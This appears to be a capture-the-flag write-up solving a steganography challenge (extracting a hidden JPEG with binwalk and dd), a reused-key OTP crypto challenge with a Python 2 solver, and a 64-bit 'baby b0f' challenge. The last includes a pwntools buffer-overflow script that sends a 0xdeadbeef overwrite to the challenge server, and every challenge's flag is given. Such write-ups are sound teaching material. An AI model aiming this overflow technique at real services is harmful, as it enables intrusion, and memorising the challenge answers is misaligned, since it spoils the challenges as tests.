Steganography

Small icon much wow

We got an image stego.jpg.

Local Picture

By using binwalk, we see that there is another .jpg file in it.

Local Picture

Using command dd if=stego.jpg of=stego1.jpg skip=202 bs=1, we can get the hidden image.

Local Picture

Accessing the QR code, we got the flag d4rk{flAg_h1dd3n_1n_th3_thumbnail}c0de.


Crypto

OTP

hackerman is so dank that he decided to play around with OTPs.
he did the following:
message1 ^ key = cipher1
message2 ^ key = cipher2
He gives you cipher1 and cipher2 and challenges you to find the concatenation of messages 1 and 2.
Are you dank enough to find this?
Oh and also, ‘meme’ is so popular that hackerman used the word in both his messages.
cipher1 is ‘\x05F\x17\x12\x14\x18\x01\x0c\x0b4’
cipher2 is ‘>\x1f\x00\x14\n\x08\x07Q\n\x0e’
Both without quotes

cipher1 ^ cipher2 = message1 ^ message2

Executing the program below, and we can find the flag d4rk{meme__meme}c0de.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#cipher1 = '\x05F\x17\x12\x14\x18\x01\x0c\x0b4'
#cipher2 = '>\x1f\x00\x14\n\x08\x07Q\n\x0e'

cipher1 = '054617121418010c0b34'
cipher2 = '3e1f00140a0807510a0e'
m1_xor_m2 = hex(int(cipher1, 16) ^ int(cipher2, 16))
print(m1_xor_m2)

#3b5917060410065d1b3a

#cipher1 = d4rk{Xmeme | d4rk{memeX
#cipher2 = Xmeme}c0de | memeX}c0de


m1_front_hex = "d4rk{".encode("hex")
m2_back_hex = "}c0de".encode("hex")
m1_xor_m2 = m1_xor_m2[2:-1]

m2_front_hex = hex(int(m1_xor_m2[0:10], 16) ^ int(m1_front_hex, 16))
m2_front = m2_front_hex[2:].decode("hex")
m1_back_hex = hex(int(m1_xor_m2[10:20], 16) ^ int(m2_back_hex, 16))
m1_back = m1_back_hex[2:].decode("hex")


m1 = "d4rk{" + m1_back
m2 = m2_front + "}c0de"

print(m1 + m2)

Pwn

baby b0f

We got a 64-bit executable q1.

Using ghidra, we can decompile its main function.

Local Picture

Local Picture

If we make local_c to the value, which is 0xdeadbeef, we can get the flag d4rk{W3lc0me_t0_th3_w0rld_0f_pwn}c0de.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
from pwn import *

p = remote('68.183.158.95', 8989)

s = ''
s += "A"*8 + "A"*2 + p64(0xdeadbeef)

p.sendline(s)

p.interactive()